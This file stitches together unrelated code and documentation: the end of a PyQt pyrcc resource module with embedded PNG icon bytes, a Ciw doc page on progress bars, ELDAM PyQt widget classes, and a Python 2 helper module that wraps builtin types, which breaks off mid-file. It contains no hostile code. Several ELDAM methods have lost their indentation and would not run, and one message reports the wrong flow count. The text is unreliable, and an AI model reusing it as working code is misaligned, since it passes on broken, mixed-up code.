\x6d\x62\x3a\x3a\x55\x52\x49\x00\x66\x69\x6c\x65\x3a\x2f\x2f\x2f\
\x68\x6f\x6d\x65\x2f\x77\x77\x77\x72\x6f\x6f\x74\x2f\x6e\x65\x77\
\x73\x69\x74\x65\x2f\x77\x77\x77\x2e\x65\x61\x73\x79\x69\x63\x6f\
\x6e\x2e\x6e\x65\x74\x2f\x63\x64\x6e\x2d\x69\x6d\x67\x2e\x65\x61\
\x73\x79\x69\x63\x6f\x6e\x2e\x63\x6e\x2f\x66\x69\x6c\x65\x73\x2f\
\x31\x32\x32\x2f\x31\x32\x32\x32\x36\x34\x35\x2e\x70\x6e\x67\x37\
\xad\x77\xd7\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82\
\x00\x00\x06\x42\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x46\x00\x00\x00\x40\x08\x04\x00\x00\x00\x0d\x7e\xc9\x12\
\x00\x00\x00\x04\x67\x41\x4d\x41\x00\x00\xb1\x8f\x0b\xfc\x61\x05\
\x00\x00\x00\x20\x63\x48\x52\x4d\x00\x00\x7a\x26\x00\x00\x80\x84\
\x00\x00\xfa\x00\x00\x00\x80\xe8\x00\x00\x75\x30\x00\x00\xea\x60\
\x00\x00\x3a\x98\x00\x00\x17\x70\x9c\xba\x51\x3c\x00\x00\x00\x02\
\x62\x4b\x47\x44\x00\x00\xaa\x8d\x23\x32\x00\x00\x00\x09\x70\x48\
\x59\x73\x00\x00\x01\x2c\x00\x00\x01\x2c\x00\x73\x88\xe9\x52\x00\
\x00\x00\x07\x74\x49\x4d\x45\x07\xe3\x01\x09\x03\x2e\x36\xda\x97\
\x87\x5a\x00\x00\x03\x39\x49\x44\x41\x54\x68\xde\xed\x99\x3d\x48\
\x5b\x51\x14\xc7\x7f\xc6\x08\xc5\x6f\x63\x89\x20\x0e\x82\x8b\x50\
\x41\x1d\x2c\xd2\x22\x86\x82\x52\x6b\x71\x71\x70\xb0\x0e\xa2\x15\
\xdd\xc4\x4d\x2b\x38\x08\x2e\x22\x28\x95\x22\x2e\x0e\x9d\x8a\x60\
\xa0\x68\xe9\xe0\x17\x88\x1d\xaa\x52\x04\x8b\x50\x1c\x14\x8a\x43\
\xfa\xa1\xf1\xa3\x0d\x46\xfb\x3a\x48\xe2\x3d\x2f\x4f\x93\x98\x97\
\xb8\xbc\x73\xa6\xc3\xfd\xdf\x73\x7e\xef\xe6\xde\xf7\x5e\xce\x4b\
\xe2\xca\x9c\x34\xf0\x94\x07\x64\x93\x4c\xfc\xed\x82\x43\xbe\xf2\
\x91\xf7\x78\xf4\x43\x76\xea\x58\xe2\x0c\x2d\xc1\x7e\xc6\x12\x75\
\xd8\x55\x94\x5c\xc6\xf1\x26\x1c\x24\xe0\x5e\xc6\xc9\x0d\xa0\xa4\
\x32\x79\x67\x20\x01\x9f\x24\xf5\x12\xa6\x01\xdf\x9d\xc3\xf8\x68\
\x00\xc8\x60\xf6\xce\x51\x34\x34\x66\xc9\xb0\x53\x4b\xb5\xd8\xe3\
\x9f\x59\xc5\x4b\x52\x9c\xcf\x92\x46\x16\x8f\x79\xa8\x9c\xdb\x6a\
\x6a\x61\x4a\xa1\xbb\x60\x04\x47\x02\x8e\xf5\xa5\x39\x18\xe1\x42\
\xa9\x3e\x05\xeb\x4a\xb8\x81\x33\x61\x28\x00\x4e\x36\x94\xea\xeb\
\x36\xb2\x95\xc1\xcd\xd0\x1b\x50\x5c\xcd\xc3\xa6\x12\x65\xdb\xb0\
\x29\xa1\x2f\xa1\x28\xfa\x8a\x36\xdb\xad\xd3\xc4\xc1\x2c\x18\x0b\
\xc6\x82\xb1\x60\x2c\x18\x0b\xc6\x82\xb1\x60\x2c\x18\x0b\xc6\x82\
\xb1\x60\x2c\x18\x0b\xe6\x2e\x61\x4a\x28\x31\x23\x8d\x3d\xf6\x14\
\x38\x79\x0d\x34\xc5\xde\xc1\x88\x7d\x65\xd2\x19\xc4\x85\x8b\x41\
\xd2\x63\x87\xd1\x94\x28\xfa\x66\x74\x12\xdd\xb4\x03\xd0\x4e\xf7\
\x2d\x9a\x6f\x6a\x45\x0d\xb6\x94\xde\xd1\x42\xa0\x01\x1a\xb1\xd5\
\x73\x10\x9c\x7d\x40\x7d\x94\xb3\x53\x59\x50\xaa\x6f\xc1\x8c\x12\
\x9e\xd2\x16\x55\x32\x07\x8b\xa2\x63\xb9\x18\x65\x47\xb0\x8d\x53\
\x65\xf6\x8c\x9d\x79\x9e\x93\x12\x24\x1d\xa6\x94\x45\x8e\x0d\x17\
\xfc\x82\x2f\x1c\x2a\xf1\x3d\xfa\x70\x09\x85\x8b\x3e\xfa\x45\x37\
\x2a\x9b\x72\xc3\x1f\x5f\x23\x83\x27\xbc\x50\x7e\x09\x3f\xf3\x90\
\xcf\x9a\xae\x23\xeb\xe7\xaf\x81\xfb\x71\x93\x23\x12\xf6\x18\x7c\
\x6b\x38\xa3\x47\x68\x72\x70\x5f\x9b\x4f\xce\x5c\x23\x1f\xa0\x2b\
\xa2\xa6\xf1\x0e\xe5\xa2\x4c\x0d\x1e\x43\x9d\x87\x1a\xa1\x2b\x67\
\x27\xa2\xfc\x5d\x97\xf2\x3c\x96\xc3\x4a\xfd\xb4\x8a\x12\x85\xa2\
\x65\x2b\x7d\x9d\x42\xa1\x6d\x0d\x59\x85\x50\x5f\x26\x2f\x20\x2f\
\x65\x25\x8c\x78\x9a\x4c\x25\x7d\x32\xc3\x37\xaa\x87\xc5\x3e\xc9\
\x64\x3a\x4c\xf6\x15\x4a\x55\x7a\x27\xfd\xec\xdf\xc0\x5d\x20\xae\
\xb5\x53\x9c\x02\x0d\x37\x6e\x11\x9f\xd2\x29\xf4\x05\x37\xac\xfd\
\x3e\xfd\x46\xad\xf0\x0a\xc6\x58\x63\x9f\x63\xfe\x28\xee\x63\x87\
\x4a\xa1\xab\xd2\x61\x6f\x52\x44\x11\x9b\xba\x12\x55\x62\x4e\x25\
\x3b\xf8\x44\xde\x63\xf6\x59\x63\x8c\x8a\x2b\x91\xfe\x08\xe7\xe0\
\x24\x37\x78\xd4\x2f\x15\x3f\xd9\x12\x57\xf9\x8e\x47\x4a\xfc\x9b\
\x16\x3e\x00\xcf\x78\x2b\xee\x32\x9f\x68\xe2\xbb\x12\x97\x70\x5f\
\xdc\xed\xfd\xfc\xc2\xc3\x01\x31\x58\x0a\x13\x62\x05\xce\xe9\x0d\
\x8e\xf5\x72\x2e\xc6\x26\xc4\x45\xc5\xc1\x9a\x39\x11\x05\xa7\x48\
\x0b\x8e\xa5\x89\x2f\x34\x1a\x27\x34\xc7\x13\xa5\x82\x5d\x51\x6e\
\x9b\x62\x31\x5e\xcc\xb6\x18\xdf\x55\x77\x84\xb9\x96\x27\x1e\x6b\
\x1a\x5e\x1a\x43\x34\x8d\xba\x0f\xaf\x0b\x57\xf7\x0f\x33\x2d\x85\
\x51\xdd\x6e\x19\x30\xd4\x0d\xe8\x76\xce\x68\xe4\x3b\x27\xf2\x37\
\xbd\x97\x74\x88\xd8\x4b\x16\xaf\x42\x5e\xce\xfe\x91\x85\x57\x9c\
\xaa\x0e\xbe\xf1\xc6\xdc\x75\x29\x63\x2f\xa2\x27\x8c\x91\xef\x51\
\x66\x26\x8a\x83\xb9\x5b\xa3\x68\x68\xcc\x99\xf7\xe5\xd3\xc6\x50\
\x4c\x28\x1a\x1a\x43\x66\xfd\x29\x6a\xe1\x28\x66\x98\x23\x5a\xcc\
\x40\x71\x5d\xf3\xde\x12\xad\x7b\x74\x6f\x85\x06\x16\xee\x34\xa5\
\xd0\x88\x9d\x1f\x26\x5c\x94\x9d\x46\x56\xf1\xdf\x24\xf9\x0f\x54\
\xf4\xd4\xb6\x0e\xa6\x7b\xac\x00\x00\x00\x25\x74\x45\x58\x74\x64\
\x61\x74\x65\x3a\x63\x72\x65\x61\x74\x65\x00\x32\x30\x31\x39\x2d\
\x30\x31\x2d\x30\x39\x54\x30\x33\x3a\x34\x36\x3a\x35\x34\x2b\x30\
\x38\x3a\x30\x30\xa7\x9d\xfe\x1a\x00\x00\x00\x25\x74\x45\x58\x74\
\x64\x61\x74\x65\x3a\x6d\x6f\x64\x69\x66\x79\x00\x32\x30\x31\x39\
\x2d\x30\x31\x2d\x30\x39\x54\x30\x33\x3a\x34\x36\x3a\x35\x34\x2b\
\x30\x38\x3a\x30\x30\xd6\xc0\x46\xa6\x00\x00\x00\x43\x74\x45\x58\
\x74\x73\x6f\x66\x74\x77\x61\x72\x65\x00\x2f\x75\x73\x72\x2f\x6c\
\x6f\x63\x61\x6c\x2f\x69\x6d\x61\x67\x65\x6d\x61\x67\x69\x63\x6b\
\x2f\x73\x68\x61\x72\x65\x2f\x64\x6f\x63\x2f\x49\x6d\x61\x67\x65\
\x4d\x61\x67\x69\x63\x6b\x2d\x37\x2f\x2f\x69\x6e\x64\x65\x78\x2e\
\x68\x74\x6d\x6c\xbd\xb5\x79\x0a\x00\x00\x00\x63\x74\x45\x58\x74\
\x73\x76\x67\x3a\x63\x6f\x6d\x6d\x65\x6e\x74\x00\x20\x47\x65\x6e\
\x65\x72\x61\x74\x6f\x72\x3a\x20\x41\x64\x6f\x62\x65\x20\x49\x6c\
\x6c\x75\x73\x74\x72\x61\x74\x6f\x72\x20\x31\x36\x2e\x30\x2e\x30\
\x2c\x20\x53\x56\x47\x20\x45\x78\x70\x6f\x72\x74\x20\x50\x6c\x75\
\x67\x2d\x49\x6e\x20\x2e\x20\x53\x56\x47\x20\x56\x65\x72\x73\x69\
\x6f\x6e\x3a\x20\x36\x2e\x30\x30\x20\x42\x75\x69\x6c\x64\x20\x30\
\x29\x20\x20\x72\x0b\x75\x96\x00\x00\x00\x18\x74\x45\x58\x74\x54\
\x68\x75\x6d\x62\x3a\x3a\x44\x6f\x63\x75\x6d\x65\x6e\x74\x3a\x3a\
\x50\x61\x67\x65\x73\x00\x31\xa7\xff\xbb\x2f\x00\x00\x00\x18\x74\
\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x49\x6d\x61\x67\x65\x3a\
\x3a\x48\x65\x69\x67\x68\x74\x00\x33\x33\x35\x27\x52\xd8\x12\x00\
\x00\x00\x17\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x49\x6d\
\x61\x67\x65\x3a\x3a\x57\x69\x64\x74\x68\x00\x33\x36\x39\xc0\x62\
\x30\x21\x00\x00\x00\x19\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\
\x3a\x4d\x69\x6d\x65\x74\x79\x70\x65\x00\x69\x6d\x61\x67\x65\x2f\
\x70\x6e\x67\x3f\xb2\x56\x4e\x00\x00\x00\x17\x74\x45\x58\x74\x54\
\x68\x75\x6d\x62\x3a\x3a\x4d\x54\x69\x6d\x65\x00\x31\x35\x34\x36\
\x39\x37\x36\x38\x31\x34\x7c\x39\x0e\x82\x00\x00\x00\x11\x74\x45\
\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x53\x69\x7a\x65\x00\x33\x39\
\x32\x31\x42\x83\x93\x35\x05\x00\x00\x00\x62\x74\x45\x58\x74\x54\
\x68\x75\x6d\x62\x3a\x3a\x55\x52\x49\x00\x66\x69\x6c\x65\x3a\x2f\
\x2f\x2f\x68\x6f\x6d\x65\x2f\x77\x77\x77\x72\x6f\x6f\x74\x2f\x6e\
\x65\x77\x73\x69\x74\x65\x2f\x77\x77\x77\x2e\x65\x61\x73\x79\x69\
\x63\x6f\x6e\x2e\x6e\x65\x74\x2f\x63\x64\x6e\x2d\x69\x6d\x67\x2e\
\x65\x61\x73\x79\x69\x63\x6f\x6e\x2e\x63\x6e\x2f\x66\x69\x6c\x65\
\x73\x2f\x31\x31\x38\x2f\x31\x31\x38\x37\x34\x32\x33\x2e\x70\x6e\
\x67\x89\xec\x0c\x47\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\
\x82\
"
qt_resource_name = b"\
\x00\x03\
\x00\x00\x59\xfd\
\x00\x53\
\x00\x69\x00\x6d\
\x00\x06\
\x07\x03\x7d\xc3\
\x00\x69\
\x00\x6d\x00\x61\x00\x67\x00\x65\x00\x73\
\x00\x08\
\x05\xe2\x59\x27\
\x00\x6c\
\x00\x6f\x00\x67\x00\x6f\x00\x2e\x00\x70\x00\x6e\x00\x67\
\x00\x09\
\x0c\x98\xba\x47\
\x00\x70\
\x00\x61\x00\x75\x00\x73\x00\x65\x00\x2e\x00\x70\x00\x6e\x00\x67\
\x00\x08\
\x02\x8c\x59\xa7\
\x00\x70\
\x00\x6c\x00\x61\x00\x79\x00\x2e\x00\x70\x00\x6e\x00\x67\
\x00\x09\
\x0a\x28\x82\xa7\
\x00\x63\
\x00\x79\x00\x63\x00\x6c\x00\x65\x00\x2e\x00\x70\x00\x6e\x00\x67\
"
qt_resource_struct_v1 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x0c\x00\x02\x00\x00\x00\x04\x00\x00\x00\x03\
\x00\x00\x00\x4c\x00\x00\x00\x00\x00\x01\x00\x00\x37\xcc\
\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x00\x62\x00\x00\x00\x00\x00\x01\x00\x00\x40\x40\
\x00\x00\x00\x34\x00\x00\x00\x00\x00\x01\x00\x00\x2f\xea\
"
qt_resource_struct_v2 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x0c\x00\x02\x00\x00\x00\x04\x00\x00\x00\x03\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x4c\x00\x00\x00\x00\x00\x01\x00\x00\x37\xcc\
\x00\x00\x01\x77\xbf\x82\x6b\xbc\
\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x01\x77\xce\x26\xc1\xd4\
\x00\x00\x00\x62\x00\x00\x00\x00\x00\x01\x00\x00\x40\x40\
\x00\x00\x01\x77\xbf\x82\x6b\xbb\
\x00\x00\x00\x34\x00\x00\x00\x00\x00\x01\x00\x00\x2f\xea\
\x00\x00\x01\x77\xbf\x82\x6b\xbb\
"
# The rcc data format changed in Qt 5.8 (version 2 adds last-modified
# timestamps to the resource structure), so pick the structure matching
# the Qt version loaded at runtime.
qt_version = [int(v) for v in QtCore.qVersion().split('.')]
if qt_version < [5, 8, 0]:
    rcc_version = 1
    qt_resource_struct = qt_resource_struct_v1
else:
    rcc_version = 2
    qt_resource_struct = qt_resource_struct_v2


def qInitResources():
    """Register the embedded resource data with Qt's resource system."""
    QtCore.qRegisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)


def qCleanupResources():
    """Unregister the embedded resource data from Qt's resource system."""
    QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)


# Resources are registered as a side effect of importing this module,
# as in every pyrcc-generated file.
qInitResources()
.. _progress-bar:
===============================
How to Implement a Progress Bar
===============================
For an individual run of a simulation, Ciw can enable a progress bar to appear.
This can help visualise how far through a simulation run currently is.
A progress bar may be implemented when using the methods :code:`simulate_until_max_time` and :code:`simulate_until_max_customers`.
In order to implement this, add the option :code:`progress_bar=True`.
An example when using the :code:`simulate_until_max_time` method::
>>> Q.simulate_until_max_time(2000.0, progress_bar=True) # doctest:+SKIP
The image below shows an example of the output:
.. image:: ../_static/progress_bar_time.png
:scale: 100 %
:alt: Output of progress bar (simulate_until_max_time).
:align: center
An example when using the :code:`simulate_until_max_customers` method::
>>> Q.simulate_until_max_customers(20000, progress_bar=True) # doctest:+SKIP
And the image below shows the output:
.. image:: ../_static/progress_bar_customers.png
:scale: 100 %
:alt: Output of progress bar (simulate_until_max_customers).
   :align: center
from abc import ABCMeta, abstractmethod
import os
import re
from PyQt5 import uic
from PyQt5.QtWidgets import QWidget, QTreeWidgetItem
from PyQt5.QtGui import QColor
from eldam.gui.dialogs import WarningDialog
from eldam.gui.gui_parameters import *
from eldam.core.parameters import PROCESS_ATTRIBUTES, PRODUCT_FLOW_ATTRIBUTES, TECHNOSPHERE_FLOW_ATTRIBUTES, \
BIOSPHERE_FLOW_ATTRIBUTES, INPUT_PARAMETERS_ATTRIBUTES, CALCULATED_PARAMETERS_ATTRIBUTES
from eldam.utils.observer import Suscriber
from eldam.utils.gui import name_from_pattern
from eldam.utils.exceptions import ConversionError
class EldamWidget(QWidget):
    """Base class shared by every top-level ELDAM widget.

    Loads the widget layout from a QtDesigner ``.ui`` file and provides a
    helper to display colored messages in the main window's status bar.
    """

    # Message types accepted by show_message()
    StandardMessage = 1
    SuccessMessage = 2
    ErrorMessage = 3

    def __init__(self, ui_file, *args, **kwargs):
        """
        Args:
            ui_file (str): Path to QtDesigner .ui file
        """
        super().__init__(*args, **kwargs)
        self.ui = uic.loadUi(ui_file, self)

    def show_message(self, message, message_type=StandardMessage, time=STATUS_BAR_MESSAGES_TIME):
        """Display *message* in the main window's status bar for *time* ms,
        styled according to *message_type*."""
        if message_type == self.SuccessMessage:
            stylesheet = STATUS_BAR_SUCCESS_STYLESHEET
        elif message_type == self.ErrorMessage:
            stylesheet = STATUS_BAR_ERROR_STYLESHEET
        else:
            stylesheet = STATUS_BAR_DEFAULT_STYLESHEET
        status_bar = self.window().statusBar
        status_bar.setStyleSheet(stylesheet)
        status_bar.showMessage(message, time)
# Combining a PyQt widget class with an ABC requires a metaclass deriving
# from both PyQt's sip metaclass (type(QWidget)) and ABCMeta; otherwise
# Python raises a metaclass conflict at class-creation time.
class AbcAndPyQtMeta(type(QWidget), ABCMeta):
    """ Class used to solve metaclass conflicts and allow to inherit from ABC classes and PyQt classes """
class EldamWidgetWithProgressBar(EldamWidget, Suscriber, metaclass=AbcAndPyQtMeta):
    """Eldam widget that mirrors the progress of a long-running task in its
    progress bar and status-bar message."""

    def update(self, step, current, total):
        """Observer-pattern hook: forward publisher notifications to the progress bar."""
        self.update_progressbar(step, current, total)

    def update_progressbar(self, step, current, total):
        """Update the progress bar and the status-bar message.

        Can be triggered manually or through update() by a publisher.

        Args:
            step (str): Name of the current step
            current (int): Current progress value
            total (int): Maximum progress value
        """
        if current == total:
            self.show_message(message_type=EldamWidget.SuccessMessage, message=step)
        else:
            # time=-1 keeps the message alive until it is changed
            self.show_message(f"{step}...", time=-1)
        # A maximum of 0 would make Qt display a busy ("infinite") progress bar
        maximum = total if total != 0 else 1
        self.progressBar.setRange(0, maximum)
        self.progressBar.setValue(current)
class EldamWidgetWithProcessSummary(EldamWidget):
    """Eldam widget owning a ``processes_summary`` QLabel."""

    def update_processes_summary(self, message: str, color: str = None):
        """Show *message* in the process summary label, in *color* (black by default)."""
        color = color or "black"
        self.processes_summary.setText(message)
        self.processes_summary.setStyleSheet("QLabel{color: " + color + "};}")
class EldamConversionWidget(EldamWidgetWithProcessSummary, metaclass=AbcAndPyQtMeta):
    """ Special class for ELDAM widgets with a tree widget to display processes and methods to convert processes """

    # Constants used to set the state of the TreeWidget
    DETAILED_VIEW = 1
    QUALITY_CHECK = 2

    def __init__(self, ui_file, *args, **kwargs):
        """
        Args:
            ui_file (str): Path to the QtDesigner .ui file (loaded by EldamWidget)
        """
        super().__init__(ui_file, *args, **kwargs)
        self.processes = list()  # processes read from the input files
        self.exports_parameters = list()  # dicts {'process': ..., 'export_filename': ...} built by build_export_list()
        # Setting TreeWidget first column width
        self.treeWidget.setColumnWidth(0, 250)
        # Alternating row colors
        self.treeWidget.setAlternatingRowColors(True)
        # Adding a separator between columns
        self.treeWidget.setStyleSheet(QTREEWIDGET_STYLESHEET)
        self.display_mode = self.DETAILED_VIEW  # Setting the default tree widget display mode
        self.toggle_display_button.clicked.connect(self.toggle_display_mode)
        self.main_button.clicked.connect(self.convert)
def toggle_display_mode(self):
""" Changes the display mode from detailed view to quality check and inversely """
if self.display_mode == self.DETAILED_VIEW:
self.show_quality_check_view()
elif self.display_mode == self.QUALITY_CHECK:
self.show_detailed_view()
    @abstractmethod
    def read_processes(self):
        """ Read the input files and populate self.processes.

        Must be implemented by concrete subclasses.
        """
    def show_detailed_view(self):
        """ Display the read processes in the tree widget """
        # Setting the display mode
        if self.display_mode == self.QUALITY_CHECK:
            self.toggle_display_button.setText("Quality check")  # Changing the button text
        self.display_mode = self.DETAILED_VIEW

        # Updating the process summary
        if len(self.processes) > 0:
            self.update_processes_summary(message=PROCESSES_READ_MESSAGE.format(len(self.processes)))

        # Removing previous data
        self.treeWidget.clear()

        # Building the tree widget: one top-level item per process, with its
        # attributes, flows and parameters as child items
        for process in self.processes:
            process_item = QTreeWidgetItem(self.treeWidget, [process.name or 'Process with no name'])
            process_item.setExpanded(True)

            for attr in PROCESS_ATTRIBUTES.items():
                QTreeWidgetItem(process_item, [attr[1], str(getattr(process, attr[0]) or '')])

            # Inserting flows
            # Product flows
            product_flows_item = QTreeWidgetItem(process_item, ['Product flows',
                                                                f"{len(process.product_flows)} product flow(s)"])
            for flow in process.product_flows:
                flow_item = QTreeWidgetItem(product_flows_item, [flow.type, flow.name])
                for attr in PRODUCT_FLOW_ATTRIBUTES.items():
                    QTreeWidgetItem(flow_item, [attr[1], str(getattr(flow, attr[0]) or '')])

            # Technosphere flows
            technosphere_flows_item = QTreeWidgetItem(process_item, ['Technosphere flows',
                                                                     f"{len(process.technosphere_flows)} "
                                                                     f"technosphere flow(s)"])
            for flow in process.technosphere_flows:
                flow_item = QTreeWidgetItem(technosphere_flows_item, [flow.type, flow.name])
                for attr in TECHNOSPHERE_FLOW_ATTRIBUTES.items():
                    QTreeWidgetItem(flow_item, [attr[1], str(getattr(flow, attr[0]) or '')])

            # Biosphere flows
            biosphere_flows_item = QTreeWidgetItem(process_item, ['Biosphere flows',
                                                                  f"{len(process.biosphere_flows)} biosphere flow(s)"])
            for flow in process.biosphere_flows:
                flow_item = QTreeWidgetItem(biosphere_flows_item, [flow.type, flow.name])
                for attr in BIOSPHERE_FLOW_ATTRIBUTES.items():
                    QTreeWidgetItem(flow_item, [attr[1], str(getattr(flow, attr[0]) or '')])

            # Parameters
            # Input parameters
            input_parameters_item = QTreeWidgetItem(process_item, ['Input parameters',
                                                                   f"{len(process.input_parameters)} "
                                                                   f"input parameter(s)"])
            for parameter in process.input_parameters:
                parameter_item = QTreeWidgetItem(input_parameters_item, [parameter.type, parameter.name])
                for attr in INPUT_PARAMETERS_ATTRIBUTES.items():
                    QTreeWidgetItem(parameter_item, [attr[1], str(getattr(parameter, attr[0]) or '')])

            # Calculated parameters
            calculated_parameters_item = QTreeWidgetItem(process_item, ['Calculated parameters',
                                                                        f"{len(process.calculated_parameters)} "
                                                                        f"calculated parameter(s)"])
            for parameter in process.calculated_parameters:
                parameter_item = QTreeWidgetItem(calculated_parameters_item, [parameter.type, parameter.name])
                for attr in CALCULATED_PARAMETERS_ATTRIBUTES.items():
                    QTreeWidgetItem(parameter_item, [attr[1], str(getattr(parameter, attr[0]) or '')])
def show_quality_check_view(self):
""" Shows a quality data check of the read processes in the tree widget """
# Setting the display mode
if self.display_mode == self.DETAILED_VIEW:
self.toggle_display_button.setText("Detailed view") # Changing the button text
self.display_mode = self.QUALITY_CHECK
# Removing previous data
self.treeWidget.clear()
# Building the tree widget
# Getting processes and flows missing quality data
incomplete_processes = []
for process in self.processes:
incomplete_flows = []
for flow in process.technosphere_flows + process.biosphere_flows:
if len(flow.missing_quality_data) > 0:
incomplete_flows.append(flow)
if len(incomplete_flows) > 0:
process_item = QTreeWidgetItem(self.treeWidget, [process.name or 'Process with no name',
MISSING_QUALITY_DATA_DETAIL_MESSAGE.format(
len(incomplete_flows))])
process_item.setExpanded(True)
incomplete_processes.append(process)
# Technosphere flows
incomplete_technosphere_flows = [flow for flow in incomplete_flows if
flow in process.technosphere_flows]
technosphere_flows_item = QTreeWidgetItem(process_item, ['Technosphere flows',
MISSING_QUALITY_DATA_DETAIL_MESSAGE.format(
len(incomplete_technosphere_flows))])
for flow in incomplete_technosphere_flows:
flow_item = QTreeWidgetItem(technosphere_flows_item, [flow.type, flow.name])
for attr in TECHNOSPHERE_FLOW_ATTRIBUTES.items():
# Inserting attributes with a different background color for missing quality data attributes
attr_item = QTreeWidgetItem(flow_item, [attr[1], str(getattr(flow, attr[0]) or '')])
if attr[0] in flow.missing_quality_data:
attr_item.setBackground(1, QColor('lightcoral'))
# Biosphere flows
incomplete_biosphere_flows = [flow for flow in incomplete_flows if flow in process.biosphere_flows]
biosphere_flows_item = QTreeWidgetItem(process_item, ['Biosphere flows',
MISSING_QUALITY_DATA_DETAIL_MESSAGE.format(
len(incomplete_technosphere_flows))])
for flow in incomplete_biosphere_flows:
flow_item = QTreeWidgetItem(biosphere_flows_item, [flow.type, flow.name])
for attr in BIOSPHERE_FLOW_ATTRIBUTES.items():
# Inserting attributes with a different background color for missing quality data attributes
attr_item = QTreeWidgetItem(flow_item, [attr[1], str(getattr(flow, attr[0]) or '')])
if attr[0] in flow.missing_quality_data:
attr_item.setBackground(1, QColor('lightcoral'))
# Updating the message
if len(self.processes) > 0:
if len(incomplete_processes) == 0:
message = NO_ERRORS_FOUND_MESSAGE.format(len(self.processes))
color = 'green'
else:
message = MISSING_QUALITY_DATA_MESSAGE.format(len(incomplete_processes))
color = 'darkorange'
self.update_processes_summary(message=message, color=color)
def build_export_list(self):
""" Building a list of items containing the process to export and the filename of the export """
self.exports_parameters = [] # Resetting the list
multiple_products_for_file_naming_warning = False
exported_filenames = [] # Storing the saved filenames for comparison
for process in self.processes:
# If multiple processes, generate filename from pattern
if len(self.processes) == 1:
export_filename = self.save_edit.text()
else:
directory, pattern = os.path.split(self.save_edit.text())
if 'PRODUCT' in pattern and process.product is None:
multiple_products_for_file_naming_warning = True
export_filename = name_from_pattern(pattern, process.name or 'process',
process.product.name if process.product is not None
else process.product_flows[0].name)
# Replacing forbidden symbols from filename by "_"
export_filename = re.sub(r'[^\w\-_\. ]', '_', export_filename)
# Looping on already existing filenames to add a number after the file name in case of duplicates
# Removing extension
filename, extension = os.path.splitext(export_filename)
while filename in exported_filenames:
parse = re.search("(?P<filename>.*)_\((?P<number>\d+)\)", filename)
if parse is not None:
number = str(int(parse['number']) + 1)
filename = parse['filename'] + '_(' + number + ')'
else:
filename = filename + '_(2)'
filename = filename + extension
export_filename = os.path.join(directory, filename)
# Adding the export filename to the list
exported_filenames.append(export_filename)
# Adding the export parameters to the list
self.exports_parameters.append({'process': process, 'export_filename': export_filename})
# If a filename have been computed from a pattern using the PRODUCT tag and the corresponding process has
# multiple products, warn the user
if multiple_products_for_file_naming_warning:
WarningDialog(self, title=MULTIPLE_PRODUCTS_FOR_FILE_NAMING_TITLE,
message=MULTIPLE_PRODUCTS_FOR_FILE_NAMING_MESSAGE).exec()
@property
def export_conflicts(self):
""" For each export, check if the file already exists """
return [export for export in self.exports_parameters if os.path.isfile(export['export_filename'])]
    @abstractmethod
    def resolve_export_conflicts(self):
        """ For each export whose file already exists, obtain the desired file handling.

        Must be implemented by concrete subclasses.
        """
    @abstractmethod
    def export_processes(self):
        """ Export the processes from the export parameters list.

        Must be implemented by concrete subclasses.
        """
def convert(self):
"""
Export the read processes to files of the corresponding output
This function operates in three steps:
1. Building the export list:
2. Resolving export conflicts:
3. Exporting the processes
"""
try:
self.build_export_list()
self.resolve_export_conflicts()
self.export_processes()
except ConversionError:
pass | PypiClean |
# harold/armor/basetypes.py
# Copyright 2006 The Incorporated Wizzo Widget Works
# Distributed under the terms of the GNU General Public License v2
# Author: Troy Melhase <troy@gci.net>
##
# Helper module for using builtin types as validators.
#
# The getargspec function in the inspect module does not work with
# builtin types. Since there is no way to introspect the type for
# their call signatures, we provide rough equivalents to them here as
# functions that can be inspected.
#
# Method signatures do not match type signatures in all cases.
# Particularly, slice and xrange signatures are only close. Better
# implementations are possible, but their worth is questionable.
#
##
# Unique sentinel used as a default value so the wrappers can distinguish
# "argument not supplied" from an explicitly-passed None (or other falsy value).
class marker:
    pass
# Inspectable stand-ins for the builtins bool..int (Python 2 era: note
# `buffer` and `file`). Parameter names deliberately mirror the builtin
# call signatures, even where they shadow builtins (e.g. `object`).
def _bool(x=False):
    return bool(x)

def _buffer(object, offset=0, size=-1):
    return buffer(object, offset, size)

def _classmethod(function):
    return classmethod(function)

def _complex(real, imag=0):
    return complex(real, imag)

def _dict(initial=marker, **kwds):
    # dict() accepts either a mapping/iterable or keyword args, not both here
    if initial is marker and not kwds:
        return dict()
    elif initial is marker:
        return dict(**kwds)
    else:
        return dict(initial)

def _enumerate(iterable):
    return enumerate(iterable)

def _file(name, mode='r', buffering=marker):
    # file() rejects buffering=None, hence the sentinel dance
    if buffering is marker:
        return file(name, mode)
    return file(name, mode, buffering)

def _float(x=0.0):
    return float(x)

def _frozenset(iterable=marker):
    if iterable is marker:
        iterable = []
    return frozenset(iterable)

def _int(x=0, base=marker):
    # int() only accepts a base when x is a string
    if base is marker:
        return int(x)
    else:
        return int(x, base)
# Inspectable stand-ins for the builtins list..super (Python 2 era: note `long`).
def _list(initial=marker):
    if initial is marker:
        return list()
    else:
        return list(initial)

def _long(x=0, base=marker):
    # long() only accepts a base when x is a string
    if base is marker:
        return long(x)
    else:
        return long(x, base)

def _object():
    return object()

def _property(fget=None, fset=None, fdel=None, doc=None):
    return property(fget, fset, fdel, doc)

def _reversed(sequence):
    return reversed(sequence)

